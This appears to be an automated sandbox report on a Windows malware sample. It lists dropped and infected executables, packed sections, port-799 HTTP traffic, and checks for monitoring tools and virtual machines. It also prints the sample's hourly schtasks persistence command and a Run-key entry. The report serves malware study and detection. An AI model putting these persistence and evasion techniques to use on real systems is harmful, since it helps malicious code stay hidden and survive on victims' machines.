Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Lisect_AVT_24003_G1A_37.exe

Static file information: File size 2447360 > 1048576

Source: Lisect_AVT_24003_G1A_37.exe

Static PE information: Raw size of xhwtmwwr is bigger than: 0x100000 < 0x1bca00

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Unpacked PE file: 0.2.Lisect_AVT_24003_G1A_37.exe.270000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xhwtmwwr:EW;tmaftcgf:EW;.taggant:EW;%~u:EW; vs :ER;.rsrc:W;.idata :W; :EW;xhwtmwwr:EW;tmaftcgf:EW;.taggant:EW;%~u:EW;
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Unpacked PE file: 2.2.MlpxPf.exe.350000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Unpacked PE file: 8.2.MPGPH131.exe.830000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xhwtmwwr:EW;tmaftcgf:EW;.taggant:EW;%~u:EW; vs :ER;.rsrc:W;.idata :W; :EW;xhwtmwwr:EW;tmaftcgf:EW;.taggant:EW;%~u:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Unpacked PE file: 11.2.MPGPH131.exe.830000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xhwtmwwr:EW;tmaftcgf:EW;.taggant:EW;%~u:EW; vs :ER;.rsrc:W;.idata :W; :EW;xhwtmwwr:EW;tmaftcgf:EW;.taggant:EW;%~u:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Unpacked PE file: 17.2.RageMP131.exe.930000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xhwtmwwr:EW;tmaftcgf:EW;.taggant:EW;%~u:EW; vs :ER;.rsrc:W;.idata :W; :EW;xhwtmwwr:EW;tmaftcgf:EW;.taggant:EW;%~u:EW;
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Unpacked PE file: 18.2.MlpxPf.exe.590000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: %~u

Source: Lisect_AVT_24003_G1A_37.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_37.exe	Static PE information: section name: .idata
Source: Lisect_AVT_24003_G1A_37.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_37.exe	Static PE information: section name: xhwtmwwr
Source: Lisect_AVT_24003_G1A_37.exe	Static PE information: section name: tmaftcgf
Source: Lisect_AVT_24003_G1A_37.exe	Static PE information: section name: .taggant
Source: Lisect_AVT_24003_G1A_37.exe	Static PE information: section name: %~u
Source: RageMP131.exe.0.dr	Static PE information: section name:
Source: RageMP131.exe.0.dr	Static PE information: section name: .idata
Source: RageMP131.exe.0.dr	Static PE information: section name:
Source: RageMP131.exe.0.dr	Static PE information: section name: xhwtmwwr
Source: RageMP131.exe.0.dr	Static PE information: section name: tmaftcgf
Source: RageMP131.exe.0.dr	Static PE information: section name: .taggant
Source: RageMP131.exe.0.dr	Static PE information: section name: %~u
Source: MPGPH131.exe.0.dr	Static PE information: section name:
Source: MPGPH131.exe.0.dr	Static PE information: section name: .idata
Source: MPGPH131.exe.0.dr	Static PE information: section name:
Source: MPGPH131.exe.0.dr	Static PE information: section name: xhwtmwwr
Source: MPGPH131.exe.0.dr	Static PE information: section name: tmaftcgf
Source: MPGPH131.exe.0.dr	Static PE information: section name: .taggant
Source: MPGPH131.exe.0.dr	Static PE information: section name: %~u
Source: MlpxPf.exe.0.dr	Static PE information: section name: .aspack
Source: MlpxPf.exe.0.dr	Static PE information: section name: .adata
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.2.dr	Static PE information: section name: PELIB
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.2.dr	Static PE information: section name: u

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Code function: 0_2_0034D509 push ecx; ret	0_2_0034D51C
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Code function: 2_2_00351638 push dword ptr [00353084h]; ret	2_2_0035170E
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Code function: 2_2_00356014 push 003514E1h; ret	2_2_00356425
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Code function: 2_2_00352D9B push ecx; ret	2_2_00352DAB
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Code function: 2_2_0035600A push ebp; ret	2_2_0035600D
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_0090D509 push ecx; ret	8_2_0090D51C
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 11_2_0090D509 push ecx; ret	11_2_0090D51C
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 17_2_00A0D509 push ecx; ret	17_2_00A0D51C
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Code function: 18_2_00591638 push dword ptr [00593084h]; ret	18_2_0059170E
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Code function: 18_2_00592D9B push ecx; ret	18_2_00592DAB
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Code function: 18_2_00596014 push 005914E1h; ret	18_2_00596425
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Code function: 18_2_0059600A push ebp; ret	18_2_0059600D

Source: Lisect_AVT_24003_G1A_37.exe	Static PE information: section name: entropy: 7.988087309899931
Source: Lisect_AVT_24003_G1A_37.exe	Static PE information: section name: xhwtmwwr entropy: 7.91333326585716
Source: Lisect_AVT_24003_G1A_37.exe	Static PE information: section name: %~u entropy: 6.934432600748185
Source: RageMP131.exe.0.dr	Static PE information: section name: entropy: 7.988087309899931
Source: RageMP131.exe.0.dr	Static PE information: section name: xhwtmwwr entropy: 7.91333326585716
Source: RageMP131.exe.0.dr	Static PE information: section name: %~u entropy: 6.934432600748185
Source: MPGPH131.exe.0.dr	Static PE information: section name: entropy: 7.988087309899931
Source: MPGPH131.exe.0.dr	Static PE information: section name: xhwtmwwr entropy: 7.91333326585716
Source: MPGPH131.exe.0.dr	Static PE information: section name: %~u entropy: 6.934432600748185
Source: MlpxPf.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ entropy: 6.93455438014042
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR entropy: 6.934974710878075
Source: SciTE.exe.2.dr	Static PE information: section name: u entropy: 6.934521566057065

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	File created: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	File created: C:\ProgramData\MPGPH131\MPGPH131.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe

File created: C:\ProgramData\MPGPH131\MPGPH131.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: Regmonclass	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131			Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 799

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found stalling execution ending in API Sleep call

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe

Stalling execution: Execution stalls by calling Sleep

graph_0-23594

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
